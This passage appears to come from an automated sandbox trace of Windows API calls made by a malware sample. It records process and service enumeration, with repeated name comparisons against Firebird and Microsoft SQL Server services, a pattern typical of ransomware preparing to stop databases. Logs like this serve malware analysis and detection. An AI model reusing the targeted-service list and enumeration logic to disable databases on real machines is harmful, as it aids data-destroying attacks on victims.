(lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0195.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0195.018] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0195.018] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0195.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0195.018] lstrlenW (lpString="Schedule") returned 8 [0195.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0195.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0195.018] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0195.018] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0195.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0195.018] lstrlenW (lpString="SecurityHealthService") returned 21 [0195.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.018] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0195.018] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0195.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0195.018] lstrlenW (lpString="SENS") returned 4 [0195.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0195.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0195.018] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0195.018] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0195.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0195.018] lstrlenW (lpString="ShellHWDetection") returned 16 [0195.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.018] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0195.018] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0195.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0195.019] lstrlenW (lpString="Spooler") returned 7 [0195.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0195.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0195.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0195.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0195.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0195.019] lstrlenW (lpString="StateRepository") returned 15 [0195.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0195.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0195.019] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0195.019] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0195.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0195.019] lstrlenW (lpString="SysMain") returned 7 [0195.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0195.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0195.019] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0195.019] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0195.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0195.019] lstrlenW (lpString="SystemEventsBroker") returned 18 [0195.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0195.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0195.019] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0195.019] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0195.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0195.019] lstrlenW (lpString="Themes") returned 6 [0195.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0195.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0195.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0195.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0195.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0195.020] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0195.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0195.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0195.020] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0195.020] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0195.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0195.023] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.024] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.025] lstrlenW (lpString="System") returned 6 [0195.025] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.026] lstrlenW (lpString="smss.exe") returned 8 [0195.026] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.026] lstrlenW (lpString="csrss.exe") returned 9 [0195.026] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.027] lstrlenW (lpString="wininit.exe") returned 11 [0195.027] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.028] lstrlenW (lpString="csrss.exe") returned 9 [0195.028] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.029] lstrlenW (lpString="winlogon.exe") returned 12 [0195.029] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.030] lstrlenW (lpString="services.exe") returned 12 [0195.030] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.030] lstrlenW (lpString="lsass.exe") returned 9 [0195.030] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.031] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.031] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.032] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.032] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.033] lstrlenW (lpString="svchost.exe") returned 11 [0195.033] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.034] lstrlenW (lpString="svchost.exe") returned 11 [0195.034] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.034] lstrlenW (lpString="dwm.exe") returned 7 [0195.034] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.035] lstrlenW (lpString="svchost.exe") returned 11 [0195.035] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.036] lstrlenW (lpString="svchost.exe") returned 11 [0195.036] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.037] lstrlenW (lpString="svchost.exe") returned 11 [0195.037] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.038] lstrlenW (lpString="svchost.exe") returned 11 [0195.038] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.039] lstrlenW (lpString="svchost.exe") returned 11 [0195.039] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.039] lstrlenW (lpString="svchost.exe") returned 11 [0195.039] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.040] lstrlenW (lpString="svchost.exe") returned 11 [0195.040] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.041] lstrlenW (lpString="svchost.exe") returned 11 [0195.041] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.041] lstrlenW (lpString="svchost.exe") returned 11 [0195.041] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.042] lstrlenW (lpString="svchost.exe") returned 11 [0195.042] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.043] lstrlenW (lpString="spoolsv.exe") returned 11 [0195.043] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.043] lstrlenW (lpString="svchost.exe") returned 11 [0195.043] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.044] lstrlenW (lpString="audiodg.exe") returned 11 [0195.044] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0195.045] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0195.045] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0195.046] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0195.046] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0195.046] lstrlenW (lpString="Memory Compression") returned 18 [0195.046] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0195.047] lstrlenW (lpString="sihost.exe") returned 10 [0195.047] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.048] lstrlenW (lpString="svchost.exe") returned 11 [0195.048] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0195.049] lstrlenW (lpString="msoia.exe") returned 9 [0195.049] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.049] lstrlenW (lpString="taskhostw.exe") returned 13 [0195.050] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.050] lstrlenW (lpString="explorer.exe") returned 12 [0195.050] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0195.051] lstrlenW (lpString="SearchUI.exe") returned 12 [0195.051] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0195.052] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0195.052] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0195.053] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0195.053] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.054] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0195.054] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0195.055] lstrlenW (lpString="hgaibc.exe") returned 10 [0195.055] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0195.056] CloseHandle (hObject=0x358) returned 1 [0195.056] Sleep (dwMilliseconds=0x1f4) [0195.569] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6beea8 [0195.569] EnumServicesStatusExW (in: hSCManager=0x6beea8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0195.570] GetLastError () returned 0xea [0195.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0195.570] EnumServicesStatusExW (in: hSCManager=0x6beea8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0195.571] CloseServiceHandle (hSCObject=0x6beea8) returned 1 [0195.571] lstrlenW (lpString="Appinfo") returned 7 [0195.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0195.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0195.571] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0195.571] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0195.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0195.571] lstrlenW (lpString="AppXSvc") returned 7 [0195.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0195.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0195.571] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0195.571] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0195.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0195.571] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0195.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.572] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0195.572] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0195.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0195.572] lstrlenW (lpString="Audiosrv") returned 8 [0195.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0195.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0195.572] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0195.572] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0195.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0195.572] lstrlenW (lpString="BFE") returned 3 [0195.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0195.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0195.572] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0195.572] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0195.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0195.572] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0195.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.572] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0195.572] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0195.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0195.572] lstrlenW (lpString="CDPSvc") returned 6 [0195.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0195.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0195.572] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0195.572] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0195.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0195.573] lstrlenW (lpString="ClickToRunSvc") returned 13 [0195.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.573] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0195.573] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0195.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0195.573] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0195.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.573] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0195.573] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0195.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0195.573] lstrlenW (lpString="CryptSvc") returned 8 [0195.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0195.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0195.573] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0195.573] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0195.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0195.573] lstrlenW (lpString="DcomLaunch") returned 10 [0195.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0195.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 